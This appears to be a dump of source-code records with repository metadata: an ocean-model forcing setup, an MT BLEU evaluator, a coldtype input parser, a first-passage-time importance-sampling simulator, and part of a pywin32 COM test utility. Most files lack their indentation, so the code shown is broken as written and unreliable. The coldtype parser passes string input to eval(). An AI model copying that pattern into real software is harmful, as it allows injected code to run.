z_interp < 0.0,
1 + npx.argmin(npx.abs(z_interp[:, :, npx.newaxis] - vs.zt[npx.newaxis, npx.newaxis, :]), axis=2),
0,
),
)
vs.kbot = npx.where(vs.kbot < settings.nz, vs.kbot, 0)
def _get_data(self, f, var):
var_obj = f.variables[var]
return npx.array(var_obj).T
@veros_routine(
dist_safe=False,
local_variables=[
"tau",
"xt",
"yt",
"zt",
"temp",
"maskT",
"salt",
"taux",
"tauy",
"sst_clim",
"sss_clim",
"sst_rest",
"sss_rest",
"t_star",
"s_star",
"rest_tscl",
],
)
def set_initial_conditions(self, state):
vs = state.variables
with h5netcdf.File(DATA_FILES["forcing"], "r") as forcing_file:
t_hor = (vs.xt[2:-2], vs.yt[2:-2])
t_grid = (vs.xt[2:-2], vs.yt[2:-2], vs.zt)
forc_coords = [self._get_data(forcing_file, k) for k in ("xt", "yt", "zt")]
forc_coords[0] = forc_coords[0] - 360
forc_coords[2] = -0.01 * forc_coords[2][::-1]
temp_raw = self._get_data(forcing_file, "temp_ic")[..., ::-1]
temp = veros.tools.interpolate(forc_coords, temp_raw, t_grid, missing_value=-1e20)
vs.temp = update(vs.temp, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * temp)
salt_raw = self._get_data(forcing_file, "salt_ic")[..., ::-1]
salt = 35.0 + 1000 * veros.tools.interpolate(forc_coords, salt_raw, t_grid, missing_value=-1e20)
vs.salt = update(vs.salt, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * salt)
forc_u_coords_hor = [self._get_data(forcing_file, k) for k in ("xu", "yu")]
forc_u_coords_hor[0] = forc_u_coords_hor[0] - 360
taux = self._get_data(forcing_file, "taux")
tauy = self._get_data(forcing_file, "tauy")
for k in range(12):
vs.taux = update(
vs.taux,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_u_coords_hor, taux[..., k], t_hor, missing_value=-1e20) / 10.0),
)
vs.tauy = update(
vs.tauy,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_u_coords_hor, tauy[..., k], t_hor, missing_value=-1e20) / 10.0),
)
sst_clim, sss_clim, sst_rest, sss_rest = [
forcing_file.variables[k][...].T for k in ("sst_clim", "sss_clim", "sst_rest", "sss_rest")
]
for k in range(12):
vs.sst_clim = update(
vs.sst_clim,
at[2:-2, 2:-2, k],
veros.tools.interpolate(forc_coords[:-1], sst_clim[..., k], t_hor, missing_value=-1e20),
)
vs.sss_clim = update(
vs.sss_clim,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sss_clim[..., k], t_hor, missing_value=-1e20) * 1000 + 35),
)
vs.sst_rest = update(
vs.sst_rest,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sst_rest[..., k], t_hor, missing_value=-1e20) * 41868.0),
)
vs.sss_rest = update(
vs.sss_rest,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sss_rest[..., k], t_hor, missing_value=-1e20) / 100.0),
)
with h5netcdf.File(DATA_FILES["restoring"], "r") as restoring_file:
rest_coords = [self._get_data(restoring_file, k) for k in ("xt", "yt", "zt")]
rest_coords[0] = rest_coords[0] - 360
vs.rest_tscl = update(
vs.rest_tscl,
at[2:-2, 2:-2, :],
veros.tools.interpolate(rest_coords, self._get_data(restoring_file, "tscl")[..., 0], t_grid),
)
t_star = self._get_data(restoring_file, "t_star")
s_star = self._get_data(restoring_file, "s_star")
for k in range(12):
vs.t_star = update(
vs.t_star,
at[2:-2, 2:-2, :, k],
veros.tools.interpolate(rest_coords, t_star[..., k], t_grid, missing_value=0.0),
)
vs.s_star = update(
vs.s_star,
at[2:-2, 2:-2, :, k],
veros.tools.interpolate(rest_coords, s_star[..., k], t_grid, missing_value=0.0),
)
@veros_routine
def set_forcing(self, state):
vs = state.variables
vs.update(set_forcing_kernel(state))
@veros_routine
def set_diagnostics(self, state):
diagnostics = state.diagnostics
settings = state.settings
diagnostics["snapshot"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].sampling_frequency = settings.dt_tracer
diagnostics["averages"].output_variables = [
"temp",
"salt",
"u",
"v",
"w",
"surface_taux",
"surface_tauy",
"psi",
]
diagnostics["cfl_monitor"].output_frequency = settings.dt_tracer * 10
@veros_routine
def after_timestep(self, state):
pass
@veros_kernel
def set_forcing_kernel(state):
vs = state.variables
settings = state.settings
year_in_seconds = 360 * 86400.0
(n1, f1), (n2, f2) = veros.tools.get_periodic_interval(vs.time, year_in_seconds, year_in_seconds / 12.0, 12)
vs.surface_taux = f1 * vs.taux[:, :, n1] + f2 * vs.taux[:, :, n2]
vs.surface_tauy = f1 * vs.tauy[:, :, n1] + f2 * vs.tauy[:, :, n2]
if settings.enable_tke:
vs.forc_tke_surface = update(
vs.forc_tke_surface,
at[1:-1, 1:-1],
npx.sqrt(
(0.5 * (vs.surface_taux[1:-1, 1:-1] + vs.surface_taux[:-2, 1:-1]) / settings.rho_0) ** 2
+ (0.5 * (vs.surface_tauy[1:-1, 1:-1] + vs.surface_tauy[1:-1, :-2]) / settings.rho_0) ** 2
)
** 1.5,
)
cp_0 = 3991.86795711963
vs.forc_temp_surface = (
(f1 * vs.sst_rest[:, :, n1] + f2 * vs.sst_rest[:, :, n2])
* (f1 * vs.sst_clim[:, :, n1] + f2 * vs.sst_clim[:, :, n2] - vs.temp[:, :, -1, vs.tau])
* vs.maskT[:, :, -1]
/ cp_0
/ settings.rho_0
)
vs.forc_salt_surface = (
(f1 * vs.sss_rest[:, :, n1] + f2 * vs.sss_rest[:, :, n2])
* (f1 * vs.sss_clim[:, :, n1] + f2 * vs.sss_clim[:, :, n2] - vs.salt[:, :, -1, vs.tau])
* vs.maskT[:, :, -1]
)
ice_mask = (vs.temp[:, :, -1, vs.tau] * vs.maskT[:, :, -1] <= -1.8) & (vs.forc_temp_surface <= 0.0)
vs.forc_temp_surface = npx.where(ice_mask, 0.0, vs.forc_temp_surface)
vs.forc_salt_surface = npx.where(ice_mask, 0.0, vs.forc_salt_surface)
if settings.enable_tempsalt_sources:
vs.temp_source = (
vs.maskT
* vs.rest_tscl
* (f1 * vs.t_star[:, :, :, n1] + f2 * vs.t_star[:, :, :, n2] - vs.temp[:, :, :, vs.tau])
)
vs.salt_source = (
vs.maskT
* vs.rest_tscl
* (f1 * vs.s_star[:, :, :, n1] + f2 * vs.s_star[:, :, :, n2] - vs.salt[:, :, :, vs.tau])
)
return KernelOutput(
surface_taux=vs.surface_taux,
surface_tauy=vs.surface_tauy,
temp_source=vs.temp_source,
salt_source=vs.salt_source,
forc_tke_surface=vs.forc_tke_surface,
forc_temp_surface=vs.forc_temp_surface,
forc_salt_surface=vs.forc_salt_surface,
)
| true | true |
f7230dd63cf79e81165f8294c83a6dba0d2b76c3 | 4,380 | py | Python | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 32 | 2021-05-15T01:03:44.000Z | 2022-03-31T10:54:48.000Z | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 31 | 2021-05-20T08:03:40.000Z | 2022-03-31T10:27:42.000Z | init2winit/mt_eval/main.py | google/init2winit | 62ec9fd31bd7b38bb7c220f15d4187bf0706506d | [
"Apache-2.0"
] | 6 | 2021-05-20T06:10:04.000Z | 2022-03-31T18:55:04.000Z | # coding=utf-8
# Copyright 2021 The init2winit Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Used to evaluate MT model (BLEU/cross_entropy_loss/log_perplexity).
"""
import json
import os
import sys
from absl import app
from absl import flags
from absl import logging
from init2winit import hyperparameters
from init2winit.dataset_lib import datasets
from init2winit.model_lib import models
from init2winit.mt_eval import bleu_evaluator
import jax
import tensorflow.compat.v2 as tf
# Enable flax xprof trace labelling.
os.environ['FLAX_PROFILE'] = 'true'
flags.DEFINE_string('checkpoint_dir', '', 'Path to the checkpoint to evaluate.')
flags.DEFINE_integer('seed', 0, 'seed used to initialize the computation.')
flags.DEFINE_integer('worker_id', 1,
'Client id for hparam sweeps and tuning studies.')
flags.DEFINE_string('experiment_config_filename', None,
'Path to the config.json file for this experiment.')
flags.DEFINE_string(
'model', '', 'Name of the model used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'dataset', '', 'Name of the dataset used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'hparam_overrides', '', 'json representation of a flattened dict of hparam '
'overrides. For nested dictionaries, the override key '
'should be specified as lr_hparams.initial_value.')
flags.DEFINE_string(
'trial_hparams_filename', None,
'Path to the hparams.json file for the trial we want to run inference on.')
flags.DEFINE_string('mt_eval_config', '',
'Json representation of the mt evaluation config.')
FLAGS = flags.FLAGS
def main(unused_argv):
# Necessary to use the tfds loader.
tf.enable_v2_behavior()
if jax.process_count() > 1:
# TODO(ankugarg): Add support for multihost inference.
raise NotImplementedError('BLEU eval does not support multihost inference.')
rng = jax.random.PRNGKey(FLAGS.seed)
mt_eval_config = json.loads(FLAGS.mt_eval_config)
if FLAGS.experiment_config_filename:
with tf.io.gfile.GFile(FLAGS.experiment_config_filename) as f:
experiment_config = json.load(f)
if jax.process_index() == 0:
logging.info('experiment_config: %r', experiment_config)
dataset_name = experiment_config['dataset']
model_name = experiment_config['model']
else:
assert FLAGS.dataset and FLAGS.model
dataset_name = FLAGS.dataset
model_name = FLAGS.model
if jax.process_index() == 0:
logging.info('argv:\n%s', ' '.join(sys.argv))
logging.info('device_count: %d', jax.device_count())
logging.info('num_hosts : %d', jax.host_count())
logging.info('host_id : %d', jax.host_id())
model_class = models.get_model(model_name)
dataset_builder = datasets.get_dataset(dataset_name)
dataset_meta_data = datasets.get_dataset_meta_data(dataset_name)
hparam_overrides = None
if FLAGS.hparam_overrides:
if isinstance(FLAGS.hparam_overrides, str):
hparam_overrides = json.loads(FLAGS.hparam_overrides)
merged_hps = hyperparameters.build_hparams(
model_name=model_name,
initializer_name=experiment_config['initializer'],
dataset_name=dataset_name,
hparam_file=FLAGS.trial_hparams_filename,
hparam_overrides=hparam_overrides)
if jax.process_index() == 0:
logging.info('Merged hps are: %s', json.dumps(merged_hps.to_json()))
evaluator = bleu_evaluator.BLEUEvaluator(FLAGS.checkpoint_dir, merged_hps,
rng,
model_class, dataset_builder,
dataset_meta_data,
mt_eval_config)
evaluator.translate_and_calculate_bleu()
if __name__ == '__main__':
app.run(main)
| 35.322581 | 80 | 0.712557 |
import json
import os
import sys
from absl import app
from absl import flags
from absl import logging
from init2winit import hyperparameters
from init2winit.dataset_lib import datasets
from init2winit.model_lib import models
from init2winit.mt_eval import bleu_evaluator
import jax
import tensorflow.compat.v2 as tf
os.environ['FLAX_PROFILE'] = 'true'
flags.DEFINE_string('checkpoint_dir', '', 'Path to the checkpoint to evaluate.')
flags.DEFINE_integer('seed', 0, 'seed used to initialize the computation.')
flags.DEFINE_integer('worker_id', 1,
'Client id for hparam sweeps and tuning studies.')
flags.DEFINE_string('experiment_config_filename', None,
'Path to the config.json file for this experiment.')
flags.DEFINE_string(
'model', '', 'Name of the model used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'dataset', '', 'Name of the dataset used to evaluate (not'
'needed if experiment_config_filenmae is provided).')
flags.DEFINE_string(
'hparam_overrides', '', 'json representation of a flattened dict of hparam '
'overrides. For nested dictionaries, the override key '
'should be specified as lr_hparams.initial_value.')
flags.DEFINE_string(
'trial_hparams_filename', None,
'Path to the hparams.json file for the trial we want to run inference on.')
flags.DEFINE_string('mt_eval_config', '',
'Json representation of the mt evaluation config.')
FLAGS = flags.FLAGS
def main(unused_argv):
tf.enable_v2_behavior()
if jax.process_count() > 1:
raise NotImplementedError('BLEU eval does not support multihost inference.')
rng = jax.random.PRNGKey(FLAGS.seed)
mt_eval_config = json.loads(FLAGS.mt_eval_config)
if FLAGS.experiment_config_filename:
with tf.io.gfile.GFile(FLAGS.experiment_config_filename) as f:
experiment_config = json.load(f)
if jax.process_index() == 0:
logging.info('experiment_config: %r', experiment_config)
dataset_name = experiment_config['dataset']
model_name = experiment_config['model']
else:
assert FLAGS.dataset and FLAGS.model
dataset_name = FLAGS.dataset
model_name = FLAGS.model
if jax.process_index() == 0:
logging.info('argv:\n%s', ' '.join(sys.argv))
logging.info('device_count: %d', jax.device_count())
logging.info('num_hosts : %d', jax.host_count())
logging.info('host_id : %d', jax.host_id())
model_class = models.get_model(model_name)
dataset_builder = datasets.get_dataset(dataset_name)
dataset_meta_data = datasets.get_dataset_meta_data(dataset_name)
hparam_overrides = None
if FLAGS.hparam_overrides:
if isinstance(FLAGS.hparam_overrides, str):
hparam_overrides = json.loads(FLAGS.hparam_overrides)
merged_hps = hyperparameters.build_hparams(
model_name=model_name,
initializer_name=experiment_config['initializer'],
dataset_name=dataset_name,
hparam_file=FLAGS.trial_hparams_filename,
hparam_overrides=hparam_overrides)
if jax.process_index() == 0:
logging.info('Merged hps are: %s', json.dumps(merged_hps.to_json()))
evaluator = bleu_evaluator.BLEUEvaluator(FLAGS.checkpoint_dir, merged_hps,
rng,
model_class, dataset_builder,
dataset_meta_data,
mt_eval_config)
evaluator.translate_and_calculate_bleu()
if __name__ == '__main__':
app.run(main)
| true | true |
f7230ef54d1dddee1a53f3db76cced7857db9283 | 1,316 | py | Python | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 142 | 2020-06-12T17:01:58.000Z | 2022-03-16T23:21:37.000Z | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 35 | 2020-04-15T15:34:54.000Z | 2022-03-19T20:26:47.000Z | coldtype/tool.py | goodhertz/coldtype | 2460b66abb28e9532f9e2b55167ae565f95366e7 | [
"Apache-2.0"
] | 14 | 2020-06-23T18:56:46.000Z | 2022-03-31T15:54:56.000Z | from coldtype.geometry.rect import Rect
def parse_inputs(inputs, defaults):
defaults["rect"] = [
Rect(1080, 1080),
lambda xs: Rect([int(x) for x in xs.split(",")])]
defaults["preview_only"] = [False, bool]
defaults["log"] = [False, bool]
parsed = {}
if not isinstance(inputs, dict):
for input in inputs:
k, v = input.split("=")
parsed[k] = v
else:
parsed = {**inputs}
out = {}
for k, v in defaults.items():
if k in ["w", "h"]:
out[k] = v
defaults[k] = [v, int]
else:
out[k] = v[0]
if k not in parsed and len(v) > 2:
raise Exception(v[2])
for k, v in parsed.items():
if k in defaults:
if defaults[k][0] is None and v is None:
pass
else:
if isinstance(v, str):
if defaults[k][1] == bool:
out[k] = bool(eval(v))
else:
out[k] = defaults[k][1](v)
else:
if k == "rect":
out[k] = Rect(v)
else:
out[k] = v
else:
print(f"> key {k} not recognized")
return out | 27.416667 | 57 | 0.410334 | from coldtype.geometry.rect import Rect
def parse_inputs(inputs, defaults):
defaults["rect"] = [
Rect(1080, 1080),
lambda xs: Rect([int(x) for x in xs.split(",")])]
defaults["preview_only"] = [False, bool]
defaults["log"] = [False, bool]
parsed = {}
if not isinstance(inputs, dict):
for input in inputs:
k, v = input.split("=")
parsed[k] = v
else:
parsed = {**inputs}
out = {}
for k, v in defaults.items():
if k in ["w", "h"]:
out[k] = v
defaults[k] = [v, int]
else:
out[k] = v[0]
if k not in parsed and len(v) > 2:
raise Exception(v[2])
for k, v in parsed.items():
if k in defaults:
if defaults[k][0] is None and v is None:
pass
else:
if isinstance(v, str):
if defaults[k][1] == bool:
out[k] = bool(eval(v))
else:
out[k] = defaults[k][1](v)
else:
if k == "rect":
out[k] = Rect(v)
else:
out[k] = v
else:
print(f"> key {k} not recognized")
return out | true | true |
f7230f80da0d79443d06cfb13653f105a7f36777 | 9,565 | py | Python | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | pyfpt/numerics/is_simulation.py | Jacks0nJ/Importance-Sampling-Code | f41fac451e9f78ab2130600ca83e1a6406ee43a5 | [
"Apache-2.0"
] | null | null | null | '''
Importance Sampling Simulation
------------------------------
This is the main module of the PyFPT code, as it runs the simulations, post
processes and exports the data ready for plotting.
'''
from timeit import default_timer as timer
import multiprocessing as mp
from multiprocessing import Process, Queue
import numpy as np
from .multi_processing_error import multi_processing_error
from .histogram_data_truncation import histogram_data_truncation
from .save_data_to_file import save_data_to_file
from .data_points_pdf import data_points_pdf
from .importance_sampling_cython import\
importance_sampling_simulations
def is_simulation(drift, diffusion, x_in, x_end,
num_runs, bias, time_step, bins=50, min_bin_size=400,
num_sub_samples=20, estimator='lognormal',
save_data=False, t_in=0., t_f=100, x_r=None):
"""Executes the simulation runs, then returns the histogram bin centres,
heights and errors.
Parameters
----------
drift : function
The drift term of the simulated Langevin equation. Must take both x and
t as arguments in the format ``(x, t)``.
diffusion : function
The diffusion term of the simulated Langevin equation. Must take both
x and t as arguments in the format ``(x, t)``.
x_in : float
The initial position value.
x_end : float
The end position value, i.e. the threshold which defines the FPT
problem.
num_runs : int
The number of simulation runs.
bias : scalar or function
The bias used in the simulated Langevin equation to achieve importance
sampling
If a scalar (float or int), this the bias amplitude, i.e. a coefficent
which mutiplies the the diffusion to define the bias.
If a function, this simply defines the bias used. Must take arguments
for both position and time in the format ``(x, t)``.
bins : int or sequence, optional
If bins is an integer, it defines the number equal width bins for the
first-passage times. If bins is a list or numpy array, it defines the
bin edges, including the left edge of the first bin and the right edge
of the last bin. The widths can vary. Defaults to 50 evenly spaced
bins.
time_step : float or int, optional
The time step. This should be at least smaller than the standard
deviation of the FPTs.
min_bin_size : int, optional
The minimum number of runs per bin to included in the data analysis.
If a bin has less than this number, it is truncated. Defaults to 400.
estimator : string, optional
The estimator used to reconstruct the target distribution probability
density from the importance sample. If ``'lognormal'``, it assumes the
weights in each bin follow a lognomral distribution. If ``'naive'``, no
assumption is made but more runs are required for convergance.
num_sub_samples : int, optional
The number of subsamples used in jackknife estimation of the errors
used for the ``'naive'`` estimator. Defaults to 20 when ``estimator``
is ``'naive'``.
Save_data : bool, optional
If ``True``, the first-passage times and the associated weights for
each run is saved to a file.
t_in : float, optional
The initial time value of simulation Defaults to 0.
t_f : float, optional
The maxiumum FPT allowed per run. If this is exceded, the
simulation run ends and returns ``t_f``, which can then be
truncated. Defaults to 100.
x_r : float, optional
The value of the reflective boundary. Must be compatible with the x_in
and x_end chosen. Defaults to unreachable value, effectively no
boundary.
Returns
-------
bin_centres : list
The centres of the histogram bins.
heights : list
The heights of the normalised histogram bars.
errors : list
The errors in estimating the heights.
"""
# Checking drift and diffusion are of the correct format
if callable(drift) is True:
if isinstance(drift(x_in, t_in), float) is True:
pass
else:
ValueError('Provided drift is not the format (x, t)')
else:
ValueError('Provided drift is not a function')
if callable(diffusion) is True:
if isinstance(diffusion(x_in, t_in), float) is True:
pass
else:
ValueError('Provided diffusion is not the format (x, t)')
else:
ValueError('Provided diffusion is not a function')
# Make sure provided values are floats for Cython
if isinstance(x_in, int) is True:
x_in = 1.0*x_in
if isinstance(x_end, int) is True:
x_end = 1.0*x_end
# Checking bias is of correct form
if isinstance(bias, float) is True or isinstance(bias, float) is True:
# If the bias argument is a scalar, use diffusion based bias
bias_type = 'diffusion'
if bias == 0:
estimator = 'naive'
print('As direct simulation, defaulting to naive estimator')
elif callable(bias):
# If a function is provided, check it is of the correct form
if isinstance(bias(x_in, t_in), float) is True:
bias_type = 'custom'
else:
ValueError('bias function must be of the form bias(x, t)')
else:
ValueError('Provided bias is not a number or function')
if isinstance(time_step, float) is not True\
and isinstance(time_step, int) is not True:
raise ValueError('time_step is not a number')
# Check the user has provided a estimator
if estimator != 'lognormal' and estimator != 'naive':
print('Invalid estimator argument, defaulting to naive method')
estimator = 'naive'
# If no x_r argument is provided, default to infinite boundary
if x_r is None:
# Set the reflective surface at an arbitrarily large value in the
# opposite direction to propagation
x_r = 10000*(x_in-x_end)
elif isinstance(x_r, float) is False:
if isinstance(x_r, int) is True:
if isinstance(x_r, bool) is True:
raise ValueError('x_r is not a number')
else:
pass
else:
raise ValueError('x_r is not a number')
elif (x_r-x_in)*(x_in-x_end) < 0:
raise ValueError('End and relfective surfaces not compatible with' +
' initial value.')
# The number of sims per core, so the total is correct
num_runs_per_core = int(num_runs/mp.cpu_count())
# Time how long the simulation runs take
start = timer()
# Using multiprocessing
def multi_processing_func(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs, queue_efolds,
queue_ws, queue_refs):
results =\
importance_sampling_simulations(x_in, x_r, x_end, t_in,
t_f, time_step, bias,
num_runs, drift, diffusion,
bias_type=bias_type,
count_refs=False)
fpt_values = np.array(results[0][:])
ws = np.array(results[1][:])
queue_efolds.put(fpt_values)
queue_ws.put(ws)
queue_efolds = Queue()
queue_ws = Queue()
queue_refs = Queue()
cores = int(mp.cpu_count()/1)
print('Number of cores used: '+str(cores))
processes = [Process(target=multi_processing_func,
args=(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs_per_core,
queue_efolds, queue_ws, queue_refs))
for i in range(cores)]
for p in processes:
p.start()
# More efficient to work with numpy arrays
fpt_array = np.array([queue_efolds.get() for p in processes])
ws_array = np.array([queue_ws.get() for p in processes])
end = timer()
print(f'The simulations took: {end - start} seconds')
# Combine into columns into 1
fpt_values = fpt_array.flatten()
w_values = ws_array.flatten()
# Sort in order of increasing Ns
sort_idx = np.argsort(fpt_values)
fpt_values = fpt_values[sort_idx]
w_values = w_values[sort_idx]
# Checking if multipprocessing error occured, by looking at correlation
_ = multi_processing_error(fpt_values, w_values)
# Truncating any data which did not reach x_end
fpt_values, w_values =\
histogram_data_truncation(fpt_values, t_f, weights=w_values,
num_sub_samples=num_sub_samples)
# Saving the data
if save_data is True:
if bias_type == 'diffusion':
save_data_to_file(fpt_values, w_values, x_in, num_runs, bias)
else:
# Label the file differently if custom bias is used.
save_data_to_file(fpt_values, w_values, x_in, num_runs,
bias(x_in, 0), extra_label='_custom_bias')
# Now analysisng the data to creating the histogram/PDF data
bin_centres, heights, errors, num_runs_used, bin_edges_untruncated =\
data_points_pdf(fpt_values, w_values, estimator, bins=bins,
min_bin_size=min_bin_size,
num_sub_samples=num_sub_samples)
# Return data as lists
return bin_centres.tolist(), heights.tolist(), errors.tolist()
| 40.876068 | 79 | 0.634919 |
from timeit import default_timer as timer
import multiprocessing as mp
from multiprocessing import Process, Queue
import numpy as np
from .multi_processing_error import multi_processing_error
from .histogram_data_truncation import histogram_data_truncation
from .save_data_to_file import save_data_to_file
from .data_points_pdf import data_points_pdf
from .importance_sampling_cython import\
importance_sampling_simulations
def is_simulation(drift, diffusion, x_in, x_end,
num_runs, bias, time_step, bins=50, min_bin_size=400,
num_sub_samples=20, estimator='lognormal',
save_data=False, t_in=0., t_f=100, x_r=None):
if callable(drift) is True:
if isinstance(drift(x_in, t_in), float) is True:
pass
else:
ValueError('Provided drift is not the format (x, t)')
else:
ValueError('Provided drift is not a function')
if callable(diffusion) is True:
if isinstance(diffusion(x_in, t_in), float) is True:
pass
else:
ValueError('Provided diffusion is not the format (x, t)')
else:
ValueError('Provided diffusion is not a function')
if isinstance(x_in, int) is True:
x_in = 1.0*x_in
if isinstance(x_end, int) is True:
x_end = 1.0*x_end
if isinstance(bias, float) is True or isinstance(bias, float) is True:
bias_type = 'diffusion'
if bias == 0:
estimator = 'naive'
print('As direct simulation, defaulting to naive estimator')
elif callable(bias):
if isinstance(bias(x_in, t_in), float) is True:
bias_type = 'custom'
else:
ValueError('bias function must be of the form bias(x, t)')
else:
ValueError('Provided bias is not a number or function')
if isinstance(time_step, float) is not True\
and isinstance(time_step, int) is not True:
raise ValueError('time_step is not a number')
if estimator != 'lognormal' and estimator != 'naive':
print('Invalid estimator argument, defaulting to naive method')
estimator = 'naive'
if x_r is None:
x_r = 10000*(x_in-x_end)
elif isinstance(x_r, float) is False:
if isinstance(x_r, int) is True:
if isinstance(x_r, bool) is True:
raise ValueError('x_r is not a number')
else:
pass
else:
raise ValueError('x_r is not a number')
elif (x_r-x_in)*(x_in-x_end) < 0:
raise ValueError('End and relfective surfaces not compatible with' +
' initial value.')
num_runs_per_core = int(num_runs/mp.cpu_count())
start = timer()
def multi_processing_func(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs, queue_efolds,
queue_ws, queue_refs):
results =\
importance_sampling_simulations(x_in, x_r, x_end, t_in,
t_f, time_step, bias,
num_runs, drift, diffusion,
bias_type=bias_type,
count_refs=False)
fpt_values = np.array(results[0][:])
ws = np.array(results[1][:])
queue_efolds.put(fpt_values)
queue_ws.put(ws)
queue_efolds = Queue()
queue_ws = Queue()
queue_refs = Queue()
cores = int(mp.cpu_count()/1)
print('Number of cores used: '+str(cores))
processes = [Process(target=multi_processing_func,
args=(x_in, x_r, x_end, t_in, t_f,
time_step, bias, num_runs_per_core,
queue_efolds, queue_ws, queue_refs))
for i in range(cores)]
for p in processes:
p.start()
fpt_array = np.array([queue_efolds.get() for p in processes])
ws_array = np.array([queue_ws.get() for p in processes])
end = timer()
print(f'The simulations took: {end - start} seconds')
fpt_values = fpt_array.flatten()
w_values = ws_array.flatten()
sort_idx = np.argsort(fpt_values)
fpt_values = fpt_values[sort_idx]
w_values = w_values[sort_idx]
_ = multi_processing_error(fpt_values, w_values)
fpt_values, w_values =\
histogram_data_truncation(fpt_values, t_f, weights=w_values,
num_sub_samples=num_sub_samples)
if save_data is True:
if bias_type == 'diffusion':
save_data_to_file(fpt_values, w_values, x_in, num_runs, bias)
else:
save_data_to_file(fpt_values, w_values, x_in, num_runs,
bias(x_in, 0), extra_label='_custom_bias')
bin_centres, heights, errors, num_runs_used, bin_edges_untruncated =\
data_points_pdf(fpt_values, w_values, estimator, bins=bins,
min_bin_size=min_bin_size,
num_sub_samples=num_sub_samples)
return bin_centres.tolist(), heights.tolist(), errors.tolist()
| true | true |
f7230f85330d992ee114b5f111b9c59920b93e24 | 8,008 | py | Python | Lib/site-packages/win32com/test/util.py | ekkipermana/robotframework-test | 243ca26f69962f8cf20cd7d054e0ff3e709bc7f4 | [
"bzip2-1.0.6"
] | 3 | 2020-06-18T16:57:44.000Z | 2020-07-21T17:52:06.000Z | com/win32com/test/util.py | huanyin88/Mod-Pywin32-For-Python3.x-DDE | 992931aa534357d54aaac34077f0128d3a740e5e | [
"Apache-2.0"
] | null | null | null | com/win32com/test/util.py | huanyin88/Mod-Pywin32-For-Python3.x-DDE | 992931aa534357d54aaac34077f0128d3a740e5e | [
"Apache-2.0"
] | null | null | null | import sys, os
import win32api
import tempfile
import unittest
import gc
import pywintypes
import pythoncom
import winerror
from pythoncom import _GetInterfaceCount, _GetGatewayCount
import win32com
import logging
import _winreg
import cStringIO as StringIO
import pywin32_testutil
from pywin32_testutil import TestLoader, TestResult, TestRunner, LeakTestCase
def CheckClean():
# Ensure no lingering exceptions - Python should have zero outstanding
# COM objects
try:
sys.exc_clear()
except AttributeError:
pass # py3k
c = _GetInterfaceCount()
if c:
print "Warning - %d com interface objects still alive" % c
c = _GetGatewayCount()
if c:
print "Warning - %d com gateway objects still alive" % c
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
# we know the CLSIDs we need, but we might not be an admin user
# and otherwise unable to register them. So as long as the progids
# exist and the DLL points at our version, assume it already is.
why_not = None
for progid in progids:
clsid = pywintypes.IID(progid)
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
# no CLSID or InProcServer32 - not registered
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
#print "Skipping registration of '%s' - already registered" % filename
return
# needs registration - see if its likely!
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
# them the same way as "real" errors.
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
# so theoretically we are able to register it.
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
# print cmd
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
def ExecuteShellCommand(cmd, testcase,
expected_output = None, # Set to '' to check for nothing
tracebacks_ok = 0, # OK if the output contains a t/b?
):
output_name = tempfile.mktemp('win32com_test')
cmd = cmd + ' > "%s" 2>&1' % output_name
rc = os.system(cmd)
output = open(output_name, "r").read().strip()
